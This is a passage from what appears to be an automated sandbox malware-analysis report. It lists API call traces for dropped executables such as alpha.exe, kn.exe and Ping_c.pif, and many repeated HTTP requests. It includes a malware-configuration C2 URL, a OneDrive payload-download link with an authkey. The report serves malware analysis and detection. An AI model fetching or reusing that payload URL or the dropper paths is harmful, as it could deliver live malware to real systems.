        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F27B4C FindFirstFileW,FindNextFileW,FindClose,4_2_00007FF744F27B4C
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F12978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,5_2_00007FF744F12978
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F1823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,5_2_00007FF744F1823C
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F035B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,5_2_00007FF744F035B8
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F01560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,5_2_00007FF744F01560
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F27B4C FindFirstFileW,FindNextFileW,FindClose,5_2_00007FF744F27B4C
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F1823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,8_2_00007FF744F1823C
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F12978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,8_2_00007FF744F12978
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F035B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,8_2_00007FF744F035B8
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F01560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,8_2_00007FF744F01560
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F27B4C FindFirstFileW,FindNextFileW,FindClose,8_2_00007FF744F27B4C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608036F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,9_2_00007FF608036F80
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080310C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,9_2_00007FF6080310C4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608033100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,9_2_00007FF608033100
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60803234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,9_2_00007FF60803234C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FCC6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,9_2_00007FF607FCC6F8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080319F8 #359,FindFirstFileW,FindNextFileW,FindClose,9_2_00007FF6080319F8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608031B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,9_2_00007FF608031B04
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDDBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,9_2_00007FF607FDDBC0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FD5E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,9_2_00007FF607FD5E58
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,9_2_00007FF607FDB3D8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F9D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF607F9D440
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDD4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,9_2_00007FF607FDD4A4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608013674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,9_2_00007FF608013674
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_029458B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,31_2_029458B4
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F1823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,35_2_00007FF744F1823C
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F12978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,35_2_00007FF744F12978
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F035B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,35_2_00007FF744F035B8
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F01560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,35_2_00007FF744F01560
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F27B4C FindFirstFileW,FindNextFileW,FindClose,35_2_00007FF744F27B4C
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F1823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,38_2_00007FF744F1823C
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F12978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,38_2_00007FF744F12978
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F035B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,38_2_00007FF744F035B8
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F01560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,38_2_00007FF744F01560
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F27B4C FindFirstFileW,FindNextFileW,FindClose,38_2_00007FF744F27B4C

        Networking

        barindex
        C2 URLs / IPs found in malware configuration
        Source: Malware configuration extractorURLs: https://onedrive.live.com/download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_0295CF48 InternetCheckConnectionA,31_2_0295CF48
        Source: Joe Sandbox ViewIP Address: 13.107.137.11 13.107.137.11
        Source: Joe Sandbox ViewASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficDNS traffic detected: DNS query: onedrive.live.com
        Source: global trafficDNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
        Source: global trafficDNS traffic detected: DNS query: 183.59.114.20.in-addr.arpa
        Source: kn.exeString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
        Source: kn.exe, 00000009.00000002.1463535859.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1459705858.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000015.00000002.1516633974.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000015.00000000.1507474970.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.7.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDisallowedCertLastSyncTimePinR
        Source: xkn.exe, 00000011.00000002.1501921672.00000223D552B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
